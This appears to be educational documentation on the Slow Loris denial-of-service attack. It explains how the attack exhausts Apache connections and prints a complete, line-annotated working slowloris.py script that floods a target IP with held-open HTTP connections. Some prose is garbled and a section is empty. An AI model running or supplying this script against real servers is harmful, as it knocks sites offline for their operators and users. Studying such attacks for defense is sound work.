Slow Loris DoS Attack
Summary
Description what this documentation is about
Description
Slow Loris was invented by Robert Hansen “RSnake” and got published in June 2009. This Denial of service (DoS) Attack belongs of the category of Low and Slow Attacks. This type of DoS attack doesn't need a tremendous amount of computing power or bandwidth to make a big impact. Furthermore, it is possible to take down a small website with the use of only PC that doesn’t even runs under full load during the attack.
The attack works only at a portion of Web server programs like Apache because it attacks a specific design decision of the connection management. Apache is designed to allow only a predefined number of connections, which can be edited in the configuration file. The sow loris this vulnerability by opening a huge amount of connections and keeps them alive during the attack. This fills up the available connections of the web server and restricts a legitimate user to access the web server.
The Slow Loris attack is keeping all its connections alive by exploiting another inconvenience of the http protocol. Http is designed to keep connections alive until the whole the whole Request is sent or there is not send any data for a period of time and a timer exceeds. This design decision is needed for extremely slow connections, which are quite common in 1991 when HTTP came out. Slow Loris is abusing this feature by never ending the and sending little header packets of a handful bytes.
Bild
Figure 1 shows one http connection of the original implementation. It starts by sending the Get request line followed by the User agent information and the accepted language. Then the exploit takes place by sending a random number to the X-a HTTP header field every fifteen seconds without closing the request. HTTP allows custom header fields which always start with “X-”.
Affected Webservers
Examine the Source code of slowloris.py
1 | import socket --------------------------------------------------------------------------------------|
2 | import random | Library Imports
3 | import time |
4 | import sys -----------------------------------------------------------------------------------------|
5 |
6 | log_level = 2 --------------------------------------------------------------------------------------|
7 | |
8 | def log(text, level=1): | Defining the Log Function
9 | if log_level >= level: |
10| print(text) --------------------------------------------------------------------------------|
11|
12| list_of_sockets = [] ------------------------------------------------------------------------------- Creating a Socket list
13|
14| regular_headers = [ --------------------------------------------------------------------------------|
15| "User-agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", | Defining HTTP header values
16| "Accept-language: en-US,en,q=0.5"] -------------------------------------------------------------|
17|
18| ip = sys.argv[1] ------------------------------------------------------------------------------------|
19| socket_count = 100 | Defining the IP address and
20| log("Attacking {} with {} sockets.".format(ip, socket_count)) --------------------------------------| the amount of connections
21|
22| log("Creating sockets...") -------------------------------------------------------------------------|
23| for _ in range(socket_count): | Creating Sockets and adding
24| try: | them to the Socket list
25| log("Creating socket nr {}".format(_), level=2) |
26| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
27| s.settimeout(4) |
28| s.connect((ip, 80)) |
29| except socket.error: |
30| break |
31| list_of_sockets.append(s) ----------------------------------------------------------------------|
32|
33| log("Setting up the sockets...") ------------------------------------------------------------------|
34| for s in list_of_sockets: |
35| s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) | Sending the initial
36| for header in regular_headers: | Header fields
37| s.send(bytes("{}\r\n".format(header).encode("utf-8"))) -------------------------------------|
38|
39| while True: ---------------------------------------------------------------------------------------|
40| log("Sending keep-alive headers...") | Sending every 15 seconds
41| for s in list_of_sockets: | a random value to the X-a
42| try: | header filed.
43| s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) | Also checking if the
44| except socket.error: | socket got disconnected
45| list_of_sockets.remove(s) | and create a new one if
46| try: | it is the case
47| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
48| s.settimeout(4) |
49| s.connect((ip, 80)) |
50| for s in list_of_sockets: |
51| s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) |
52| for header in regular_headers: |
53| s.send(bytes("{}\r\n".format(header).encode("utf-8"))) |
54| except socket.error: |
55| continue |
56| |
57| time.sleep(15) --------------------------------------------------------------------------------|